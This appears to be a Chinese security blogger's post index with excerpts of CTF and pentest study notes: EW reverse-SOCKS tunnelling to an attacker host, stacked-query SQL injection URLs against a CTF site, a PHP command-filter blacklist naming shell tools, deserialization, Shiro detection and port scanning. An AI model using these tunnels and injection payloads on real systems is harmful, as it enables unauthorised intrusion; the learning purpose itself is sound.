
笔记
闲人end
这个作者很懒,什么都没留下…
展开
-
KALI-64位运行32位程序解决和EW初步使用
dpkg --add-architecture i386 wget archive.kali.org/archive-key.asc apt-key add archive-key.asc apt-get update apt-get install libc6:i386 ./ew_linux -s rcsocks -l 1080 -e 1234 ew_win -s rsscocks -d 攻击主机地址 -e 1234 拓展应用EW与proxyresolv 配合:proxyresolv可启动nma原创 2021-06-04 00:01:25 · 733 阅读 · 0 评论 -
2021-4-26
1, <?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; $comm2 = $_GET['comm2']; if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1)) $file原创 2021-04-26 22:14:02 · 227 阅读 · 0 评论 -
end的学习 21-4-20
mkdir 创建权限为777的目录:mkdir -m 777 test3 通过 mkdir 命令可以实现在指定位置创建以 DirName(指定的文件名)命名的文件夹或目录。要创建文件夹或目录的用户必须对所创建的文件夹的父文件夹具有写权限。并且,所创建的文件夹(目录)不能与其父目录(即父文件夹)中的文件名重名,即同一个目录下不能有同名的(区分大小写)。 chdir() chdir() 函数改变当前的目录。 <?php // Get current directory echo getcwd() .原创 2021-04-20 21:50:45 · 170 阅读 · 0 评论 -
end 21-4-19
强网杯 2019 随便注 http://www.bmzclub.cn:20431/?inject=1';show database;# http://www.bmzclub.cn:20431/?inject=1';show tables;# http://www.bmzclub.cn:20431/?inject=1';show columns from flagg;# http://www.bmzclub.cn:20431/?inject=1';sEt @a=concat("sel","ect fla原创 2021-04-19 23:09:59 · 244 阅读 · 0 评论 -
end的学习反序列化4
1, <?php include "flag5.php"; class funny{ private $a; function __construct() { $this->a = "givemeflag"; } function __destruct() { global $flag; if ($this->a === "givemeflag") { echo $flag;原创 2021-04-18 00:28:54 · 615 阅读 · 1 评论 -
end的学习反序列化存储和使用的引擎不一样(session.serialize_handler)
session.serialize_handler session.serialize_handler是用来设置session的序列话引擎的,除了默认的PHP引擎之外,还存在其他引擎,不同的引擎所对应的session的存储方式不相同。 php_binary:存储方式是,键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值 php:存储方式是,键名+竖线+经过serialize()函数序列处理的值 php_serialize(php>5.5.4原创 2021-04-13 21:07:08 · 289 阅读 · 0 评论 -
end的学习反序列化3
1,wakeup <?php class SoFun{ //类 protected $file='index.php';//protected:是受保护的,只有在类内部以及继承类中使用,类外部不能使用。换 function __destruct(){//函数 if(!empty($this->file)) {//empty() 函数用于检查一个变量是否为空。 if(strchr($this-> file,"\\")===false && st原创 2021-04-08 21:17:45 · 470 阅读 · 0 评论 -
end的python学习shiro检测
识别SHIRO框架: 请求包里面发送:RememberMe= 响应头里面出现cookie rememberme 代码检测是否使用SHIRO框架: import requests import urllib3 urllib3.disable_warnings() header={ 'cookie':'rememberMe=1' } def check_shiro(url): res=requests.get(url,verify=False,headers=header) if原创 2021-04-05 21:10:50 · 488 阅读 · 0 评论 -
end的学习python---端口扫描
连接百度80端口 import socket s=socket.socket() s.connect(("www.baidu.com",80)) s.send(b"test\n") print(s.recv(1024)) 多线程端口扫描 import socket from concurrent.futures import ThreadPoolExecutor from rich.progress import ( Progress, TextColumn, BarColumn原创 2021-03-30 22:55:34 · 186 阅读 · 0 评论 -
end的爬虫学习1-----获取子域名
网页文本获取 import requests url='https://www.baidu.com' headers={ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0' } html=requests.get(url,headers=headers).text print(html) xpath的标签定位 nodename 选取此节点的所有子节点 /原创 2021-03-29 21:52:27 · 381 阅读 · 0 评论 -
end遇见不懂的问题
strcmp() 函数 语法:strcmp(string1,string2) 0 - 如果两个字符串相等 <0 - 如果 string1 小于 string2 >0 - 如果 string1 大于 string2 GET请求:?a[]=2 因为strcmp()无法比较数组,则报错并返回0,0==0成立 md5()弱类型和sha1()函数(绕过) 1.md5: ①经过md5加密之后相等,首先我们能想到的是md5的一个缺陷,也就是说经过md5加密之后以0e开头的,值都为0,那是因为0e在比较的时原创 2020-10-21 20:27:59 · 297 阅读 · 0 评论 -
waf绕过方法闲人
一:动态调用 waf会对文件内容进行检索,如果发现有什么危险的函数,或者有什么危害的逻辑,都会进行拦击,所以我们不能写入一些危险的函数,否则就会被ban掉。在我们真正恶意代码前加入大量杂糅字符进行绕过;然后对后缀进行换行绕过; �� [.ShellClassInfo] LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21770 IconResource=%SystemRoot%\system32\imageres.dll,-112原创 2020-10-16 16:51:13 · 1995 阅读 · 0 评论 -
end的SQL注入漏洞学习
select count(*) from admin where usename=‘admin’ and password='password’ select:查询动作 count(*):字段名 admin:表名 usename,password:字段名 ‘admin’,‘password’:字段值 注入漏洞分类 1,数字型 数字型注入最多出现在ASP,PHP等弱类型语言中,弱类型语言会自动推导变量类型。而在JAVA,C#这类强类型语言,如果试图把一个字符串转换成int类型,则会抛出异常,无法继续执行。 2原创 2020-09-08 13:28:01 · 183 阅读 · 0 评论 -
end的docker练习
一,下载 在kali上进行编码下载。 二,操作 1,容器的使用 a. Docker以ubuntu 15.10镜像建立一个容器,在容器内执行/bin/echo “Hello world” 我一开始命令不行,后来是发现没有启动docker服务(service docker restart) 因为ub 15.10的镜像本机上没有,所以docker会自动从docker hub下载公共镜像。 b.以进程方式运行的容器,得到的会是容器的ID。通过命令(docker ps)可以查看容器的相关属性。 CONTAINER原创 2020-09-01 01:08:24 · 116 阅读 · 0 评论 -
End的HTTP协议学习
** 1,HTTP协议解析 HTTP即超文本传输协议,是一种规定了浏览器和万维网之间相互通讯的规则,它允许HTML(超文本标记语言)文档从web服务器传送到web浏览器。 ** 1.1 发起HTTP请求 在浏览器地址栏输入URL按下回车键,就可以发起HTTP请求。 URL格式:协议://服务器IP【:端口】/路径/【?查询】 例:https://mp.youkuaiyun.com/console/home Windows可以在curl.exe上请求: curl http://服务器IP地址 可以返回该界面的HTML数据原创 2020-08-24 17:48:09 · 585 阅读 · 0 评论